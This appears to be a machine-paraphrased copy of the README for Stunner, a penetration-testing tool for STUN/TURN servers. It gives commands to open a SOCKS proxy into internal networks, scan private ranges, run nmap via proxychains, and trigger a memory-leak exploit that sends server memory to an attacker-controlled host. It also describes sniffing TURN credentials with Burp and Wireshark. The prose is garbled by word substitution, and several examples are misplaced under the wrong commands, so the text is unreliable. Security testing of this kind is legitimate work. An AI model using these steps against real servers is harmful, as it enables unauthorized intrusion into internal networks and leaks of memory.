Software To Take a look at And Exploit STUN, TURN And TURN Over TCP Servers

Stunner is a device to check and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol principally utilized in videoconferencing and audio chats (WebRTC).

Should you discover a misconfigured server you should utilize this device to open a neighborhood socks proxy that relays all visitors by way of the TURN protocol into the inner community behind the server.

I developed this device throughout a take a look at of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/publish/multiple_vulnerabilities_cisco_expressway/

To get the required username and password it’s essential to fetch them utilizing an out-of-band methodology like sniffing the Join request from an online browser with Burp. I added an instance workflow on the backside of the readme on how you’ll take a look at such a server.

This work is licensed below the Artistic Commons Attribution-NonCommercial-ShareAlike 4.0 Worldwide License. To view a replica of this license, go to http://creativecommons.org/licenses/by-nc-sa/4.0/ or ship a letter to Artistic Commons, PO Field 1866, Mountain View, CA 94042, USA.

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156

data

This command will print some data concerning the stun or flip server like supported protocols and attributes just like the used software program.

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --timeout worth               join timeout to show server (default: 1s)  --help, -h                    present assist (default: false)  

Instance

--debug, -d                   allow debug output (default: false)
--turnserver worth, -s worth  flip server to connect with within the format host:port
--tls                         Use TLS for connecting (false in most exams) (default: false)
--timeout worth               join timeout to show server (default: 1s)
--help, -h                    present assist (default: false)

range-scan

This command tries a number of non-public and restricted ranges to see if the TURN server is configured to permit connections to the required IP addresses. If a particular vary just isn’t prohibited you may enumerate this vary additional with the opposite offered instructions. If an ip is reachable it means the TURN server will ahead visitors to this IP.

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout worth               join timeout to show server (default: 1s)  --username worth, -u worth    username for the flip server  --password worth, -p worth    password for the flip server  --help, -h                    present assist (default: false)  

Instance

TCP based mostly TURN connection (connection from you the TURN server):

./stunner data -s x.x.x.x:443

UDP based mostly TURN connection (connection from you the TURN server):

--debug, -d                   allow debug output (default: false)
--turnserver worth, -s worth  flip server to connect with within the format host:port
--tls                         Use TLS for connecting (false in most exams) (default: false)
--protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout worth               join timeout to show server (default: 1s)
--username worth, -u worth    username for the flip server
--password worth, -p worth    password for the flip server
--help, -h                    present assist (default: false)

socks

This is without doubt one of the most helpful instructions for TURN servers that help TCP connections to backend servers. It’s going to launch a neighborhood socks5 server with no authentication and can relay all TCP visitors over the TURN protocol (UDP by way of SOCKS is presently not supported). If the server is misconfuigured it should ahead the visitors to inside adresses so this can be utilized to achieve inside programs and abuse the server as a proxy into the inner community. Should you select to additionally do DNS lookups over socks, it will likely be resolved utilizing your native nameserver so it is best to work with non-public IPv4 and IPv6 addresses. Please remember that this module can solely relay TCP visitors.

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout worth               join timeout to show server (default: 1s)  --username worth, -u worth    username for the flip server  --password worth, -p worth    password for the flip server  --listen worth, -l worth      Handle and port to hear on (default: "127.0.0.1:1080")  --drop-public, -x             Drop requests to public IPs. That is useful if the goal cannot hook up with the web and your browser need's to examine TLS certificates by way of the connection. (default: true)  --help, -h                    present assist (default: false)  

Instance

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

After beginning the proxy open your browser, level the proxy in your settings to socks5 with an ip of 127.0.0.1:1080 (make sure you not set the bypass native deal with choice as we need to attain the distant native addresses) and name the IP of your selection within the browser.

Instance: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (these will name the ports on the examined TURN server from the native interfaces).

You may also configure proxychains to make use of this proxy (however it will likely be very sluggish as every request ends in a number of requests to allow the proxying). Simply edit /and so on/proxychains.conf and enter the worth socks5 127.0.0.1 1080 below ProxyList.

Instance of nmap over this socks5 proxy with an accurate configured proxychains (word it is -sT to do TCP syns in any other case it is not going to use the socks5 proxy)

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

brute-transports

This can probably yield no useable info however might be helpful to enumerate all accessible transports (=protocols to inside programs) supported by the server. This would possibly present some customized protocol implementations however principally will solely return the defaults.

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout worth               join timeout to show server (default: 1s)  --username worth, -u worth    username for the flip server  --password worth, -p worth    password for the flip server  --help, -h                    present assist (default: false)  

Instance

--debug, -d                   allow debug output (default: false)
--turnserver worth, -s worth  flip server to connect with within the format host:port
--tls                         Use TLS for connecting (false in most exams) (default: false)
--protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout worth               join timeout to show server (default: 1s)
--username worth, -u worth    username for the flip server
--password worth, -p worth    password for the flip server
--listen worth, -l worth      Handle and port to hear on (default: "127.0.0.1:1080")
--drop-public, -x             Drop requests to public IPs. That is useful if the goal cannot hook up with the web and your browser need's to examine TLS certificates by way of the connection. (default: true)
--help, -h                    present assist (default: false)

memoryleak

This assault works the next approach: The server takes the information to ship to goal (should be a excessive port > 1024 typically) as a TLV (Kind Size Worth). This exploit makes use of a giant size with a brief worth. If the server doesn’t examine the boundaries of the TLV, it’d ship you some reminiscence up the size to the goal. Cisco Expressway was confirmed susceptible to this however in accordance with cisco it solely leaked reminiscence of the present session.

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout worth               join timeout to show server (default: 1s)  --username worth, -u worth    username for the flip server  --password worth, -p worth    password for the flip server  --target worth, -t worth      Goal to leak reminiscence to within the type host:port. Ought to be a public server below your management  --size worth                  Measurement of the buffer to leak (default: 35510)  --help, -h                    present assist (default: false)  

Instance

To obtain the information we have to arrange a receiver on a server with a public ip. Usually firewalls are configured to solely permit highports (>1024) from TURN servers so make sure you use a excessive port like 8080 on this instance when connecting out to the web.

./stunner socks -s x.x.x.x:3478 -u username -p password -x

then execute the next assertion in your machine including the general public ip to the t parameter

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1

If it really works it is best to see large a great deal of reminiscence coming in, in any other case you’ll solely see brief messages.

udp-scanner

If a TURN server permits UDP connections to targets this scanner can be utilized to scan all non-public ip ranges and ship them SNMP and DNS requests. As this checks loads of IPs this could take a number of days to finish so use with warning or specify smaller targets by way of the parameters. You’ll want to provide a SNMP group string that might be tried and a site identify that might be resolved on every IP. For the area identify you may for instance use burp collaborator.

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout worth               join timeout to show server (default: 1s)  --username worth, -u worth    username for the flip server  --password worth, -p worth    password for the flip server  --community-string worth      SNMP group string to make use of for scanning (default: "public")  --domain worth                area identify to resolve on inside DNS servers throughout scanning  --ip worth                    Scan single IP as an alternative of complete non-public vary. If left empty all non-public ranges are scanned. Accepts single IPs or CIDR format.  (accepts a number of inputs)  --help, -h                    present assist (default: false)  

Instance

--debug, -d                   allow debug output (default: false)
--turnserver worth, -s worth  flip server to connect with within the format host:port
--tls                         Use TLS for connecting (false in most exams) (default: false)
--protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout worth               join timeout to show server (default: 1s)
--username worth, -u worth    username for the flip server
--password worth, -p worth    password for the flip server
--help, -h                    present assist (default: false)

tcp-scanner

Identical as udp-scanner however sends out HTTP requests to the required ports (HTTPS just isn’t supported)

Choices

--debug, -d                   allow debug output (default: false)  --turnserver worth, -s worth  flip server to connect with within the format host:port  --tls                         Use TLS for connecting (false in most exams) (default: false)  --protocol worth              protocol to make use of when connecting to the TURN server. Supported values: tcp and udp (default: "udp")  --timeout worth               join timeout to show server (default: 1s)  --username worth, -u worth    username for the flip server  --password worth, -p worth    password for the flip server  --ports worth                 Ports to examine (default: "80,443,8080,8081")  --ip worth                    Scan single IP as an alternative of complete non-public vary. If left empty all non-public ranges are scanned. Accepts single IPs or CIDR format.  (accepts a number of inputs)  --help, -h                    present assist (default: false)  

Instance

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

For instance you discover a service utilizing WebRTC and need to take a look at it.

First step is to get the required knowledge. I counsel to launch Wireshark within the background and simply be a part of a gathering by way of Burp to gather all HTTP and Websocket visitors. Subsequent search your burp historical past for some key phrases associated to TURN like 3478, password, credential and username (make sure you additionally examine the websocket tab for these key phrases). This would possibly reveal the flip server and the protocol (UDP and TCP endpoints might need totally different ports) and the credentials used to attach. If you cannot discover the information in burp begin taking a look at wireshark to establish the visitors. If it is on a non commonplace port (the rest then 3478) decode the protocol in Wireshark by way of a proper click on as STUN. This could present you the username used to attach and you should utilize this info to look burps historical past even additional for the required knowledge . Please word that Wireshark cannot present you the password because the password is used to hash some package deal contents so it cannot be reversed.

Subsequent step can be to situation the data command to the flip server utilizing the right port and protocol obtained from burp.

If this works, the following step is a range-scan. If this enables any visitors to inside programs you may exploit this additional however remember that UDP has solely restricted use circumstances.

If TCP connections to inside programs are allowed merely launch the socks command and entry the allowed IPs by way of a browser and set the socks proxy to 127.0.0.1:1080. You’ll be able to check out 127.0.0.1:443 and different ips to search out administration interfaces.